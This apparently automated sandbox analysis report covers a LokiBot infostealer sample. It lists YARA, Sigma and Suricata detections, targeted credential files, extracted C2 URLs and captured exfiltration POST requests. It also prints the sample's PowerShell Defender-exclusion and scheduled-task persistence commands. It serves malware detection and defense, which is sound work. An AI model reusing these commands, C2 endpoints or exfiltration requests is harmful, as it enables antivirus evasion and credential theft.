8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
8.2.RegSvcs.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
8.2.RegSvcs.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.LEmJJ87mUQ.exe.4249108.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.LEmJJ87mUQ.exe.4249108.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.LEmJJ87mUQ.exe.4249108.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.LEmJJ87mUQ.exe.4249108.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.LEmJJ87mUQ.exe.4249108.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", ProcessId: 3380, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aWBoUwiux.exe, ParentImage: C:\Users\user\AppData\Roaming\aWBoUwiux.exe, ParentProcessId: 5572, ParentProcessName: aWBoUwiux.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp", ProcessId: 2508, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", ProcessId: 3056, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe", ProcessId: 3380, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LEmJJ87mUQ.exe", ParentImage: C:\Users\user\Desktop\LEmJJ87mUQ.exe, ParentProcessId: 5016, ParentProcessName: LEmJJ87mUQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp", ProcessId: 3056, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:16.044187+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:17.626140+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49751	172.67.134.88	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:14.887037+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:19.561668+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49763	172.67.134.88	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:19.163529+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:20.808835+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49763	172.67.134.88	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:19.163529+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:20.808835+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49763	172.67.134.88	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:14.887037+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:19.561668+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49763	172.67.134.88	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:14:14.887037+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49749	172.67.134.88	80	TCP
2024-12-03T17:14:16.418643+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49751	172.67.134.88	80	TCP
2024-12-03T17:14:17.932918+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49757	172.67.134.88	80	TCP
2024-12-03T17:14:19.561668+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49763	172.67.134.88	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sirr/five/fre.php	Avira URL Cloud: Label: malware
Source: touxzw.ir/sirr/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "touxzw.ir/sirr/five/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: LEmJJ87mUQ.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LEmJJ87mUQ.exe

Joe Sandbox ML: detected

Source: LEmJJ87mUQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: LEmJJ87mUQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdbh source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: Accessibility.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbT^ source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: n(C:\Windows\zdr.pdb5 source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: symbols\exe\zdr.pdb30&n source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: ?&nC:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: zdr.pdb source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr, WERB83E.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\zdr.pdbpdbzdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: zdr.pdbws\zdr.pdbpdbzdr.pdb\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb( source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: @&n.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: zdr.pdbZ source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\zdr.pdb= source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb(G source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\zdr.pdbM source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdbZ~ source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdb$(,048 source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: zdr.pdbSHA256T` source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr
Source:	Binary string: .pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\aWBoUwiux.PDB source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbu source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		0_2_07B06900
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		0_2_07B068F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49751 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49751 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49751 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49763 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49763 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49763 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49757 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49749 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49763 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49763 -> 172.67.134.88:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49751 -> 172.67.134.88:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: touxzw.ir/sirr/five/fre.php

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 153Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00404ED4 recv,

8_2_00404ED4

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sirr/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66673698Content-Length: 180Connection: close

